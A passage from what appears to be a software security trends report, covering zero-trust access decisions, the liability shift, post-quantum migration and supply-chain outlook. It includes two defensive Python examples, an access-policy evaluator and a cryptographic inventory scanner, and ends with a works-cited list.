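An added example, not the report's or any vendor's code, of the per-request decision described in 3.4 and here in 5.2: every access to a repository, build or production target is evaluated on an explicit role grant, on MFA freshness scaled to the target's sensitivity, and on device health, with the network the request came from carrying no weight at all. The role table, sensitivity levels, MFA windows and scenarios are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

# Constructed policy tables (assumptions for the example, not any product's defaults).
ROLE_PERMISSIONS = {
    "developer":        {("repo:orion-core", "read"), ("repo:orion-core", "push")},
    "release-engineer": {("repo:orion-core", "read"), ("build:orion", "trigger")},
    "sre":              {("prod:orion", "deploy")},
}
# Higher sensitivity means a shorter acceptable age for the last MFA proof.
RESOURCE_SENSITIVITY = {"repo:orion-core": 1, "build:orion": 2, "prod:orion": 3}
MFA_MAX_AGE = {1: timedelta(hours=12), 2: timedelta(hours=1), 3: timedelta(minutes=15)}


@dataclass(frozen=True)
class Principal:
    user: str
    roles: frozenset
    mfa_verified_at: Optional[datetime]


@dataclass(frozen=True)
class Device:
    device_id: str
    managed: bool
    disk_encrypted: bool
    patched: bool


@dataclass(frozen=True)
class Request:
    principal: Principal
    device: Device
    resource: str
    action: str
    now: datetime   # injected so decisions are reproducible; no source IP field on purpose


def evaluate(req: Request):
    """Deny by default. Every request is re-checked on identity, MFA freshness
    and device posture; where the request came from is not an input."""
    reasons = []
    granted = any((req.resource, req.action) in ROLE_PERMISSIONS.get(role, set())
                  for role in req.principal.roles)
    if not granted:
        reasons.append("no role grants this action (least privilege)")
    level = RESOURCE_SENSITIVITY.get(req.resource, 3)   # unknown targets treated as most sensitive
    mfa_at = req.principal.mfa_verified_at
    if mfa_at is None or req.now - mfa_at > MFA_MAX_AGE[level]:
        reasons.append("MFA not verified recently enough for this resource")
    d = req.device
    if not (d.managed and d.disk_encrypted and d.patched):
        reasons.append("device posture check failed")
    return (not reasons, reasons)


# Constructed scenarios.
NOW = datetime(2025, 6, 1, 12, 0, tzinfo=timezone.utc)
HEALTHY = Device("lap-01", managed=True, disk_encrypted=True, patched=True)
UNPATCHED = Device("lap-02", managed=True, disk_encrypted=True, patched=False)
DEV = Principal("alice", frozenset({"developer"}), NOW - timedelta(hours=2))
SRE_FRESH = Principal("bob", frozenset({"sre"}), NOW - timedelta(minutes=5))
SRE_STALE = Principal("bob", frozenset({"sre"}), NOW - timedelta(minutes=30))

SCENARIOS = {
    "dev pushes code":            Request(DEV, HEALTHY, "repo:orion-core", "push", NOW),
    "dev deploys prod":           Request(DEV, HEALTHY, "prod:orion", "deploy", NOW),
    "sre deploys, stale MFA":     Request(SRE_STALE, HEALTHY, "prod:orion", "deploy", NOW),
    "sre deploys, unpatched dev": Request(SRE_FRESH, UNPATCHED, "prod:orion", "deploy", NOW),
    "sre deploys, all checks ok": Request(SRE_FRESH, HEALTHY, "prod:orion", "deploy", NOW),
}


def run_scenarios() -> dict:
    return {name: evaluate(req) for name, req in SCENARIOS.items()}
```

Returning every failed reason rather than the first one matters operationally: the denial log then shows whether a request failed on entitlement, on authentication freshness or on device health, which is what an analyst needs to tell a stale session from a misused account.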

5.3 From Voluntary to Mandatory (The Liability Shift)

For years, software enjoyed a liability shield ("provided as-is").

The Shift: EO 14028, the SEC's disclosure rules (charging SolarWinds' CISO), and the EU's Cyber Resilience Act have pierced this shield. Security is now a legal duty. The CISO role has evolved from a technical IT function to a "Chief Risk Officer" role with direct reporting lines to the CEO/Board to manage this liability. [62]

5.4 From "Shift Left" to "Shift Everywhere"

"Shift Left" (testing early) was the slogan of 2018. By 2025, it was recognized as insufficient on its own.

The Shift: Security is now continuous. It happens at design (Threat Modeling), code (SAST/AI Assistant), build (SCA/SBOM), deploy (IaC scanning), and runtime (RASP/Cloud Defense). The loop is closed: runtime data feeds back into dev to prioritize fixes. [65]

Looking Ahead

6. Future Implications (2026–2030)

As we look toward the second half of the decade, several trends will crystallize, presenting new challenges and requiring strategic pivots.

6.1 The "Quantum Cliff" and Cryptographic Agility

The transition to Post-Quantum Cryptography will be the "Y2K of Security," but more complex.

Implication: Organizations that have not inventoried their cryptographic dependencies will fail to meet the NSA's 2030/2033 deadlines. "Harvest Now, Decrypt Later" attacks will intensify, forcing companies to immediately encrypt long-term sensitive data with hybrid (classical + PQC) schemes. Cryptographic Agility—the ability to swap algorithms without rewriting applications—will become a primary architectural requirement. [59]
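
An added example (not the report's or the NSA's tooling) of the cryptographic inventory effort named in 4.4 and here in 6.1: a scanner that flags algorithm identifiers in source and configuration, tags each as quantum-vulnerable or not, maps it to the FIPS 203/204/205 replacement, and orders the migration so that key-establishment primitives, the ones exposed to harvest-now-decrypt-later, come first. The sample files and the regex rules are constructed, and the mapping of primitives to targets is the example's own reading of the standards the report lists; a real inventory would also cover binaries, certificates and key stores.

```python
import re

# Constructed sample files, a few lines each, standing in for a real code base.
SAMPLES = {
    "vpn/tunnel.conf":    ["KeyExchange = ecdh-p256", "Cipher = AES-256-GCM"],
    "release/sign.py":    ["signer = RSASigner(key_size=2048)",
                           "digest = hashlib.sha256(blob).digest()"],
    "edge/tls_server.go": ["cfg.CurvePreferences = []tls.CurveID{tls.X25519}"],
    "firmware/boot.c":    ["if (!verify_ecdsa_p384(sig, pubkey, image)) halt();"],
}

# (pattern, primitive, role, quantum status, migration target)
RULES = [
    (re.compile(r"\bRSA", re.I), "RSA", "public-key (signature or key transport)",
     "quantum-vulnerable",
     "ML-DSA (FIPS 204) for signing, ML-KEM (FIPS 203) for key establishment"),
    (re.compile(r"\b(ECDH|X25519|ecdh-p\d+)\b", re.I), "ECDH", "key agreement",
     "quantum-vulnerable",
     "ML-KEM (FIPS 203), hybrid with the classical curve during transition"),
    (re.compile(r"\bECDSA\b|ecdsa_p\d+", re.I), "ECDSA", "signature",
     "quantum-vulnerable", "ML-DSA (FIPS 204) or SLH-DSA (FIPS 205)"),
    (re.compile(r"\bAES-?(128|192|256)\b", re.I), "AES", "symmetric cipher",
     "not broken by Shor; confirm 256-bit keys", "AES-256"),
    (re.compile(r"\bsha-?256\b", re.I), "SHA-256", "hash",
     "not broken by Shor; confirm digest size meets policy", "SHA-384 or larger"),
]


def inventory(samples: dict) -> list:
    """Every line that names a primitive becomes one finding with file, line and evidence."""
    findings = []
    for path, lines in samples.items():
        for lineno, text in enumerate(lines, start=1):
            for pattern, primitive, role, status, target in RULES:
                if pattern.search(text):
                    findings.append({"file": path, "line": lineno, "primitive": primitive,
                                     "role": role, "status": status, "target": target,
                                     "evidence": text.strip()})
    return findings


def priority(finding: dict) -> int:
    """0: quantum-vulnerable key agreement (harvest-now-decrypt-later exposure),
    1: other quantum-vulnerable public-key use, 2: everything else."""
    if finding["status"] != "quantum-vulnerable":
        return 2
    return 0 if finding["role"] == "key agreement" else 1


def migration_order(findings: list) -> list:
    return sorted(findings, key=priority)   # stable: file order kept within a tier


def summary(findings: list) -> dict:
    counts = {}
    for f in findings:
        counts[f["status"]] = counts.get(f["status"], 0) + 1
    return counts
```

The ordering encodes the report's "Harvest Now, Decrypt Later" point: a signature forged in 2033 is a problem in 2033, but traffic captured today under a classical key exchange is already at risk, so the VPN and TLS key agreement findings are scheduled ahead of the signing code even though the RSA finding may look more familiar.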

6.2 Agentic Security and the "Self-Healing" Stack

AI will move from a "Copilot" (advisor) to an "Agent" (actor).

Implication: We will see the rise of Autonomous Security Operations Centers (ASOCs) where AI agents detect an intrusion, isolate the affected container, patch the vulnerability in the code, test the fix, and redeploy—all without human intervention. The human role will shift to governance and policy definition. [43]

6.3 The Fragmentation of the Global Stack

Geopolitical tensions and divergent regulatory regimes (EU's GDPR/CRA vs. US EO 14028 vs. China's regulations) are leading to a "Splinternet" of software compliance.

Implication: Global software vendors will face increasing difficulty maintaining a single codebase. We may see the "regionalization" of software supply chains, where components must be vetted and hosted within specific sovereign borders to meet local "Digital Sovereignty" requirements. [63]

6.4 The Death of "Implicitly Trusted" Open Source

The Log4j and XZ Utils incidents have permanently scarred the open-source ecosystem.

Implication: The era of freely pulling dependencies from npm or PyPI is ending for enterprise software. Organizations will move toward Curated Private Registries, where every package is vetted, scanned, and perhaps even "rebuilt" internally to ensure provenance. The "free lunch" of open source now comes with a "verification tax." [18]

Conclusion

Security is not a feature; it is the foundation.

The decade from 2015 to 2025 transformed software security from a technical niche into a central pillar of digital civilization. We have learned that we cannot secure what we cannot see (Log4j), that we cannot trust what we do not verify (SolarWinds), and that the perimeter is everywhere (Zero Trust). As we enter the AI and Quantum eras, the fundamental lesson remains: the organizations that thrive in 2030 will be those that have successfully embedded this truth into their culture, their code, and their boardrooms.

Works Cited

1. What is Agile DevSecOps? - GitLab. https://about.gitlab.com/topics/agile-devsecops/

2. Waterfall vs Agile vs DevOps - Medium. medium.com

3. SAST, DAST & IAST - Imperva. imperva.com

4. SAST vs DAST vs IAST vs RASP 2025 - DeepStrike. deepstrike.io

5. Software Vulnerability Landscape Study - NIST. nist.gov

6. Evolution of Cybersecurity Vulnerability Management - AI Security Chronicles. aisecuritychronicles.org

7. Evolving Cybersecurity Threat Landscape - Electronic Specifier. electronicspecifier.com

8. Modern Threat Landscape Guide - Kaspersky. kaspersky.com

9. The Evolving CVE Landscape - F5 Labs. f5.com

10. GDPR's Impact on Cybersecurity - IJSRA. ijsra.net

11. GDPR Impact on Software Development - Ideafloats. ideafloats.com

12. GDPR Impact on Data Security - NABCoIT. nabcoit.com

13. GDPR Compliance - Fortra. fortra.com

14. Pre-commit - OWASP DevSecOps Guideline. owasp.org

15. Evolution from DevOps to DevSecOps - Cogent University. cogentuniversity.com

16. Software Supply Chain Attack Vectors - NSF. nsf.gov

17. OWASP Top 10 2025: Supply Chain - Secure Code Warrior. securecodewarrior.com

18. Security Frameworks Supply Chain - Reversing Labs. reversinglabs.com

19. Software Supply Chain Security Regulations - DZone. dzone.com

20. SBOM Consumption Practices - CISA. cisa.gov

21. SolarWinds Supply Chain Attack - OpenText. microfocus.com

22. Log4j Vulnerabilities and DevSecOps - Illumio. illumio.com

23. Log4j Vulnerable to RCE - Google Cloud. cloud.google.com

24. SBOM: Cornerstone of Software Security - INCYBER. incyber.org

25. SBOM Security Game-Changer - Bureau Veritas. bureauveritas.com

26. Supply Chain Risks and Log4j - Tanium. tanium.com

27. Apache Log4j 2 Recommendations - Google Cloud. cloud.google.com

28. EO Improving Cybersecurity - CISA. cisa.gov

29. EO14028 Timeline - aDolus. adolus.com

30. Executive Order 14028 - Palo Alto Networks. paloaltonetworks.com

31. EO 14028 - NIST. nist.gov

32. Presidential Documents - OFAC. treasury.gov

33. State of Cybersecurity 2025 - Ivanti. ivanti.com

34. DevSecOps Stories - DevSecOps Guides. devsecopsguides.com

35. DevSecOps Best Practices 2025 - Codefresh. codefresh.io

36. Software Development Trends 2025 - Graphite. graphite.com

37. From VM to ASPM - RiskInsight. riskinsight-wavestone.com

38. AppSec to ASPM Transition - Apiiro. apiiro.com

39. What is ASPM? - OpsMx. opsmx.com

40. ASPM Key Components - Cycode. cycode.com

41. Leveraging ASPM - Veracode. veracode.com

42. ASPM Tools - Palo Alto Networks. paloaltonetworks.com

43. AI-Generated Code Breaches - RG-CS. rg-cs.co.uk

44. AI Coding Tools Security - Fortune. fortune.com

45. AI Security Trends 2025 - Checkmarx. checkmarx.com

46. AI Cybersecurity Threats - DeepStrike. deepstrike.io

47. Weekly Recap - The Hacker News. thehackernews.com

48. AI Security Trends - Auxis. auxis.com

49. AI Cybersecurity Use Cases - AIMultiple. aimultiple.com

50. Secure Software Attestation Form - CISA. cisa.gov

51. Secure Software Development Attestation - CISA. cisa.gov

52. CISA Self-Attestation Implications - Chertoff Group. chertoffgroup.com

53. IoT Cybersecurity Labeling - BakerHostetler. bakerlaw.com

54. US Cyber Trust Mark - IoT For All. iotforall.com

55. FCC Cybersecurity Labeling - Nabto. nabto.com

56. PQC Standardization Process - NIST CSRC. nist.gov

57. NIST PQC Standardization - Wikipedia. wikipedia.org

58. NIST Post-Quantum Standards - Terra Quantum. terraquantum.swiss

59. E2E Encryption CNSA 2.0 - Garantir. garantir.io

60. NSA CNSA 2.0 - PostQuantum. postquantum.com

61. Quantum-Proof CNSA 2.0 - Encryption Consulting. encryptionconsulting.com

62. CISO Role Changes 2025 - Sprinto. sprinto.com

63. Elevating Cybersecurity - WEF. weforum.org

64. CISO Survey 2024 - Heidrick & Struggles. heidrick.com

65. AppSec Trends 2026 - OX Security. ox.security

66. SAST vs DAST - Wiz. wiz.io

67. Quantum Threats Federal Agencies - GTI. governmenttechnologyinsider.com

68. Quantum Diplomacy Report - CERN. cern.ch

69. Closing the Chain - Moonlight. themoonlight.io